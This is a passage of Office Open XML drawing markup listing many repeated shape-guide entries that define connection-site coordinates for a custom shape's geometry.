              <a:gd name="connsiteX3" fmla="*/ 3237722 w 3237722"/>
              <a:gd name="connsiteY3" fmla="*/ 1844955 h 1844955"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1953752"/>
              <a:gd name="connsiteY0" fmla="*/ 2678 h 850545"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1953752"/>
              <a:gd name="connsiteY1" fmla="*/ 95984 h 850545"/>
              <a:gd name="connsiteX2" fmla="*/ 1437951 w 1953752"/>
              <a:gd name="connsiteY2" fmla="*/ 306441 h 850545"/>
              <a:gd name="connsiteX3" fmla="*/ 1953752 w 1953752"/>
              <a:gd name="connsiteY3" fmla="*/ 850545 h 850545"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1953752"/>
              <a:gd name="connsiteY0" fmla="*/ 17088 h 864955"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1953752"/>
              <a:gd name="connsiteY1" fmla="*/ 110394 h 864955"/>
              <a:gd name="connsiteX2" fmla="*/ 1953752 w 1953752"/>
              <a:gd name="connsiteY2" fmla="*/ 864955 h 864955"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 17088 h 232495"/>
              <a:gd name="connsiteX1" fmla="*/ 871271 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 110394 h 232495"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 232495 h 232495"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 3281 h 218688"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 8958 h 218688"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 218688 h 218688"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 3281 h 218688"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 8958 h 218688"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 218688 h 218688"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 594851 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 28537 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 5177 h 220584"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 18474 h 220584"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 220584 h 220584"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 13297 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1321292"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 215407"/>
              <a:gd name="connsiteX1" fmla="*/ 606281 w 1321292"/>
              <a:gd name="connsiteY1" fmla="*/ 13297 h 215407"/>
              <a:gd name="connsiteX2" fmla="*/ 1321292 w 1321292"/>
              <a:gd name="connsiteY2" fmla="*/ 215407 h 215407"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1279382"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 451627"/>
              <a:gd name="connsiteX1" fmla="*/ 564371 w 1279382"/>
              <a:gd name="connsiteY1" fmla="*/ 249517 h 451627"/>
              <a:gd name="connsiteX2" fmla="*/ 1279382 w 1279382"/>
              <a:gd name="connsiteY2" fmla="*/ 451627 h 451627"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1751822"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1495567"/>
              <a:gd name="connsiteX1" fmla="*/ 564371 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 24951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49081 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 66480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94801 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 66099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94801 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 66099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94801 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 66099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194801 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 660997 h 1495567"/>
              <a:gd name="connsiteX2" fmla="*/ 1751822 w 1751822"/>
              <a:gd name="connsiteY2" fmla="*/ 1495567 h 1495567"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1751822"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1495567"/>
              <a:gd name="connsiteX1" fmla="*/ 381491 w 1751822"/>
              <a:gd name="connsiteY1" fmla="*/ 889597 h 1495567"/>
              <a:gd name="connsiteX2" fmla="*/ 1751822 w 1751822"/>
              <a:gd name="connsiteY2" fmla="*/ 1495567 h 1495567"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1804287"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1712925"/>
              <a:gd name="connsiteX1" fmla="*/ 433956 w 1804287"/>
              <a:gd name="connsiteY1" fmla="*/ 1106955 h 1712925"/>
              <a:gd name="connsiteX2" fmla="*/ 1804287 w 1804287"/>
              <a:gd name="connsiteY2" fmla="*/ 1712925 h 1712925"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1804287"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1712925"/>
              <a:gd name="connsiteX1" fmla="*/ 411471 w 1804287"/>
              <a:gd name="connsiteY1" fmla="*/ 934569 h 1712925"/>
              <a:gd name="connsiteX2" fmla="*/ 1804287 w 1804287"/>
              <a:gd name="connsiteY2" fmla="*/ 1712925 h 1712925"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1646890"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1548033"/>
              <a:gd name="connsiteX1" fmla="*/ 411471 w 1646890"/>
              <a:gd name="connsiteY1" fmla="*/ 934569 h 1548033"/>
              <a:gd name="connsiteX2" fmla="*/ 1646890 w 1646890"/>
              <a:gd name="connsiteY2" fmla="*/ 1548033 h 1548033"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1690705"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1563273"/>
              <a:gd name="connsiteX1" fmla="*/ 411471 w 1690705"/>
              <a:gd name="connsiteY1" fmla="*/ 934569 h 1563273"/>
              <a:gd name="connsiteX2" fmla="*/ 1690705 w 1690705"/>
              <a:gd name="connsiteY2" fmla="*/ 1563273 h 1563273"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1690705"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1563273"/>
              <a:gd name="connsiteX1" fmla="*/ 449571 w 1690705"/>
              <a:gd name="connsiteY1" fmla="*/ 919329 h 1563273"/>
              <a:gd name="connsiteX2" fmla="*/ 1690705 w 1690705"/>
              <a:gd name="connsiteY2" fmla="*/ 1563273 h 1563273"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2523825"/>
              <a:gd name="connsiteY0" fmla="*/ 807352 h 825116"/>
              <a:gd name="connsiteX1" fmla="*/ 1282691 w 2523825"/>
              <a:gd name="connsiteY1" fmla="*/ 4561 h 825116"/>
              <a:gd name="connsiteX2" fmla="*/ 2523825 w 2523825"/>
              <a:gd name="connsiteY2" fmla="*/ 648505 h 825116"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1245767 h 1263531"/>
              <a:gd name="connsiteX1" fmla="*/ 1282691 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 442976 h 1263531"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 4880 h 1263531"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1244197 h 1269842"/>
              <a:gd name="connsiteX1" fmla="*/ 1678931 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 797006 h 1269842"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 3310 h 1269842"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1245546 h 1271191"/>
              <a:gd name="connsiteX1" fmla="*/ 1678931 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 798355 h 1271191"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 4659 h 1271191"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1245546 h 1278550"/>
              <a:gd name="connsiteX1" fmla="*/ 1678931 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 798355 h 1278550"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 4659 h 1278550"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1245546 h 1245546"/>
              <a:gd name="connsiteX1" fmla="*/ 1678931 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 798355 h 1245546"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 4659 h 1245546"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1244857 h 1244857"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 934826 h 1244857"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 3970 h 1244857"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 930856 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3642985"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3642985"/>
              <a:gd name="connsiteY1" fmla="*/ 930856 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3642985"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646214"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3646214"/>
              <a:gd name="connsiteY1" fmla="*/ 930856 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646214"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646378"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3646378"/>
              <a:gd name="connsiteY1" fmla="*/ 930856 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646378"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646378"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3646378"/>
              <a:gd name="connsiteY1" fmla="*/ 930856 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646378"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646378"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3646378"/>
              <a:gd name="connsiteY1" fmla="*/ 930856 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646378"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646378"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3646378"/>
              <a:gd name="connsiteY1" fmla="*/ 930856 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646378"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646378"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1892291 w 3646378"/>
              <a:gd name="connsiteY1" fmla="*/ 930856 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646378"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646473"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1922771 w 3646473"/>
              <a:gd name="connsiteY1" fmla="*/ 961336 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646473"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646473"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1922771 w 3646473"/>
              <a:gd name="connsiteY1" fmla="*/ 961336 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646473"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646395"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1922771 w 3646395"/>
              <a:gd name="connsiteY1" fmla="*/ 961336 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646395"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3646441"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1922771 w 3646441"/>
              <a:gd name="connsiteY1" fmla="*/ 961336 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3646441"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 3113656 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 704461 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1599816 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1100701 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3113656 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 704461 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 3113656 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 704461 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 2986656 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 689221 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 2986656 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 689221 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 2956176 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 679061 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 2956176 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 679061 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 2956176 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 679061 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 2956176 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 679061 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 2956176 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 679061 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3641425"/>
              <a:gd name="connsiteY0" fmla="*/ 1240887 h 1240887"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3641425"/>
              <a:gd name="connsiteY1" fmla="*/ 1121021 h 1240887"/>
              <a:gd name="connsiteX2" fmla="*/ 2956176 w 3641425"/>
              <a:gd name="connsiteY2" fmla="*/ 679061 h 1240887"/>
              <a:gd name="connsiteX3" fmla="*/ 3641425 w 3641425"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1240887"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3624280"/>
              <a:gd name="connsiteY0" fmla="*/ 1158972 h 1158972"/>
              <a:gd name="connsiteX1" fmla="*/ 1691256 w 3624280"/>
              <a:gd name="connsiteY1" fmla="*/ 1039106 h 1158972"/>
              <a:gd name="connsiteX2" fmla="*/ 2956176 w 3624280"/>
              <a:gd name="connsiteY2" fmla="*/ 597146 h 1158972"/>
              <a:gd name="connsiteX3" fmla="*/ 3624280 w 3624280"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1158972"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3624280"/>
              <a:gd name="connsiteY0" fmla="*/ 1158972 h 1158972"/>
              <a:gd name="connsiteX1" fmla="*/ 1538856 w 3624280"/>
              <a:gd name="connsiteY1" fmla="*/ 1064506 h 1158972"/>
              <a:gd name="connsiteX2" fmla="*/ 2956176 w 3624280"/>
              <a:gd name="connsiteY2" fmla="*/ 597146 h 1158972"/>
              <a:gd name="connsiteX3" fmla="*/ 3624280 w 3624280"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1158972"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3624280"/>
              <a:gd name="connsiteY0" fmla="*/ 1158972 h 1158972"/>
              <a:gd name="connsiteX1" fmla="*/ 1538856 w 3624280"/>
              <a:gd name="connsiteY1" fmla="*/ 1064506 h 1158972"/>
              <a:gd name="connsiteX2" fmla="*/ 2900296 w 3624280"/>
              <a:gd name="connsiteY2" fmla="*/ 693666 h 1158972"/>
              <a:gd name="connsiteX3" fmla="*/ 3624280 w 3624280"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1158972"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3624280"/>
              <a:gd name="connsiteY0" fmla="*/ 1158972 h 1158972"/>
              <a:gd name="connsiteX1" fmla="*/ 1538856 w 3624280"/>
              <a:gd name="connsiteY1" fmla="*/ 1064506 h 1158972"/>
              <a:gd name="connsiteX2" fmla="*/ 2900296 w 3624280"/>
              <a:gd name="connsiteY2" fmla="*/ 693666 h 1158972"/>
              <a:gd name="connsiteX3" fmla="*/ 3624280 w 3624280"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1158972"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3625347"/>
              <a:gd name="connsiteY0" fmla="*/ 1158972 h 1158972"/>
              <a:gd name="connsiteX1" fmla="*/ 1538856 w 3625347"/>
              <a:gd name="connsiteY1" fmla="*/ 1064506 h 1158972"/>
              <a:gd name="connsiteX2" fmla="*/ 2900296 w 3625347"/>
              <a:gd name="connsiteY2" fmla="*/ 693666 h 1158972"/>
              <a:gd name="connsiteX3" fmla="*/ 3624280 w 3625347"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1158972"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3624280"/>
              <a:gd name="connsiteY0" fmla="*/ 1158972 h 1158972"/>
              <a:gd name="connsiteX1" fmla="*/ 1538856 w 3624280"/>
              <a:gd name="connsiteY1" fmla="*/ 1064506 h 1158972"/>
              <a:gd name="connsiteX2" fmla="*/ 2900296 w 3624280"/>
              <a:gd name="connsiteY2" fmla="*/ 693666 h 1158972"/>
              <a:gd name="connsiteX3" fmla="*/ 3624280 w 3624280"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1158972"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3624280"/>
              <a:gd name="connsiteY0" fmla="*/ 1158972 h 1158972"/>
              <a:gd name="connsiteX1" fmla="*/ 1538856 w 3624280"/>
              <a:gd name="connsiteY1" fmla="*/ 1064506 h 1158972"/>
              <a:gd name="connsiteX2" fmla="*/ 2900296 w 3624280"/>
              <a:gd name="connsiteY2" fmla="*/ 693666 h 1158972"/>
              <a:gd name="connsiteX3" fmla="*/ 3624280 w 3624280"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1158972"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1538856 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1039106 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2900296 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 668266 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1538856 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1039106 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2595496 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 576826 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2595496 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 576826 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2595496 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 592066 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1133572"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3344880"/>
              <a:gd name="connsiteY0" fmla="*/ 1133572 h 1133572"/>
              <a:gd name="connsiteX1" fmla="*/ 1437256 w 3344880"/>
              <a:gd name="connsiteY1" fmla="*/ 1018786 h 1133572"/>
              <a:gd name="connsiteX2" fmla="*/ 2595496 w 3344880"/>
              <a:gd name="connsiteY2" fmla="*/ 592066 h 1133572"/>
              <a:gd name="connsiteX3" fmla="*/ 3344880 w 3344880"/>
